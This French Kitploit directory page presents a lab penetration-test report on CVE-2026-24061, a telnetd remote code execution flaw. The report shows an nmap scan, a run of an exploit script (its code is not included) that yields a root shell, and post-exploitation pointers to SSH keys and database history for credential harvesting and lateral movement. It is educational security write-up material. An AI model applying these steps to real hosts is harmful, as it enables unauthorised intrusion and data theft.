Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CyberhawksLab-telnetCVE — Rapport/découverte de la CVE-2026-24061 au sein du laboratoire Cyberhawks | Kitploit
Outils/GitHubGitHub/skyejacobson/cyberhawkslab-telnetcve
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionApprentissage et Éducation
GitHubskyejacobson/cyberhawkslab-telnetcve

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CyberhawksLab-telnetCVE

Rapport/découverte de la CVE-2026-24061 au sein du laboratoire Cyberhawks

Voir le dépôt
1il y a 1 jourPas encore vérifié
Partager

Rapport de découverte du laboratoire CyberHawks

Crédit : @SafeBreach-Labs

CVE : CVE-2026-24061

Laboratoire : Cyberhawks Lab
Cible : 10.1.1.1 (demo.cyberhawks.lab)
ID de découverte : WU-08
Date : 2026-09-08
Sévérité : Critique
Statut : Confirmé / Exploité


Résumé Exécutif

Lors d'une évaluation de l'environnement du laboratoire Cyberhawks, une vulnérabilité d'exécution de code à distance (RCE) non authentifiée a été identifiée et exploitée avec succès sur l'hôte cible (10.1.1.1). L'exploitation de CVE-2026-24061 via un service Telnet exposé (TCP/23) a permis d'obtenir un shell interactif de niveau root, accordant un contrôle administratif total sur le système.


Portée et Environnement

ChampValeur
IP cible10.1.1.1
Nom d'hôte cibledemo.cyberhawks.lab
Système d'exploitationLinux 6.12.41+deb13-amd64 (Debian 13)
OS de l'attaquantParrot OS
Type d'évaluationTest d'intrusion (Environnement de laboratoire)

Reconnaissance

Scan de ports

Un scan de versions de services Nmap a été effectué contre la cible afin d'énumérer les ports et services ouverts.

Commande :

root@kitploit:~
nmap -sV 10.1.1.1

Résumé des résultats :

Observations notables :

  • L'hôte expose une surface d'attaque large et préoccupante sur 15 ports.
  • Le port 23 (Telnet) était accessible, ce qui en faisait une cible prioritaire immédiate.
  • La présence de Telnet — un protocole intrinsèquement non sécurisé, en clair — sur tout hôte moderne représente une mauvaise configuration critique. Il est probable que la version du service soit exploitable.

Détails de la vulnérabilité

Description

CVE-2026-24061 est une vulnérabilité d'exécution de code à distance non authentifiée affectant le composant démon Telnet de GNU inetutils 2.6. L'exploitation permet à un attaquant distant non authentifié d'exécuter des commandes arbitraires sur le système cible avec les privilèges du service en cours d'exécution — dans ce cas, root.


Exploitation

Outil / Exploit utilisé

Un script d'exploitation Python spécialement conçu (telnet_rce.py) ciblant CVE-2026-24061 a été exécuté contre le service Telnet vulnérable.

Commande :

root@kitploit:~
python3 telnet_rce.py 10.1.1.1

Sortie de l'exploit :

root@kitploit:~
[*] Connected to 10.1.1.1:23
[*] Interactive session started. Use Ctrl+C to quit.

Linux 6.12.41+deb13-amd64 (demo.cyberhawks.lab) (pts/0)

root@demo:~#

Vérification post-exploitation

Après l'obtention d'un shell, les commandes suivantes ont confirmé le niveau d'accès atteint :

Vérification de l'identité :

root@kitploit:~
root@demo:~# id
uid=0(root) gid=0(root) groups=0(root)

Énumération du système de fichiers :

root@kitploit:~
root@demo:~# ls -la
total 36
drwx------  6 root root 4096 Aug 28 14:47 .
drwxr-xr-x 19 root root 4096 Aug 28 15:37 ..
-rw-r--r--  1 root root  607 May 12  2025 .bashrc
drwx------  4 root root 4096 Sep  6  2025 .cache
drwxr-xr-x  3 root root 4096 Sep  6  2025 .config
drwxrwxr-x  3 root root 4096 Sep  6  2025 .local
-rw-------  1 root root  261 Sep  6  2025 .mariadb_history
-rw-r--r--  1 root root  132 May 12  2025 .profile
drwx------  2 root root 4096 Sep  6  2025 .ssh

Vérification de la version du service

root@kitploit:~
root@demo:~# telnet --version

telnet (GNU inetutils) 2.6
Copyright (C) 2025 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.

Principales conclusions de la post-exploitation :

  • .mariadb_history — indique une utilisation active de la base de données MariaDB ; potentiel de collecte supplémentaire d'identifiants ou d'exfiltration de données.
  • Répertoire .ssh/ — peut contenir des clés privées utilisables pour un mouvement latéral vers d'autres hôtes.
  • L'accès complet root (UID 0) a été confirmé sans qu'aucune étape d'élévation de privilèges ne soit nécessaire.

Impact

CatégorieÉvaluation
ConfidentialitéCritique — toutes les données du système sont accessibles
IntégritéCritique — l'attaquant peut modifier ou détruire toutes les données
DisponibilitéCritique — l'attaquant peut interrompre les services ou faire planter le système

Une compromission totale du système a été réalisée en une seule étape non authentifiée. Un attaquant ayant accès à ce segment réseau pourrait :

  • Lire, modifier ou exfiltrer toutes les données stockées sur l'hôte.
  • Collecter des identifiants à partir de l'historique du shell, des fichiers de configuration et de la base de données MariaDB.
  • Utiliser les clés SSH pour pivoter latéralement vers d'autres hôtes du réseau.
  • Établir une persistance (par exemple, comptes backdoor, tâches cron, rootkits).
  • Perturber la disponibilité de tous les services exécutés sur l'hôte.

Recommandations

Immédiates (Priorité critique)

  1. Corriger ou atténuer CVE-2026-24061 — Appliquer le correctif fourni par le fournisseur pour GNU inetutils si Telnet doit rester en service. Vérifier la disponibilité d'un paquet mis à jour :
    root@kitploit:~
    apt update && apt install inetutils-telnetd
    

Artefacts et Preuves

ArtefactDescription
Sortie du scan NmapÉnumération complète des ports/services de 10.1.1.1
telnet_rce.pyScript d'exploit utilisé pour déclencher CVE-2026-24061
Journal de session shellTranscription du shell interactif root

Rapport préparé pour Cyberhawks Lab — à usage éducatif uniquement.

Télécharger l’outil
PortÉtatService
21/tcpOuvertFTP (tcpwrapped)
22/tcpOuvertSSH (tcpwrapped)
23/tcpOuvertTelnet
25/tcpOuvertSMTP (tcpwrapped)
53/tcpOuvertDNS (tcpwrapped)
80/tcpOuvertHTTP (tcpwrapped)
110/tcpOuvertPOP3 (tcpwrapped)
111/tcpOuvertRPC (tcpwrapped)
139/tcpOuvertNetBIOS (tcpwrapped)
143/tcpOuvertIMAP (tcpwrapped)
445/tcpOuvertSMB (tcpwrapped)
2049/tcpOuvertNFS (tcpwrapped)
3306/tcpOuvertMySQL/MariaDB (tcpwrapped)
3389/tcpOuvertRDP (tcpwrapped)
5901/tcpOuvertVNC (tcpwrapped)
ChampDétail
CVECVE-2026-24061
Service affectéTelnet (GNU inetutils 2.6, TCP/23)
Type de vulnérabilitéExécution de code à distance (RCE) non authentifiée
Score CVSSCritique
Authentification requiseAucune
Interaction utilisateur requiseAucune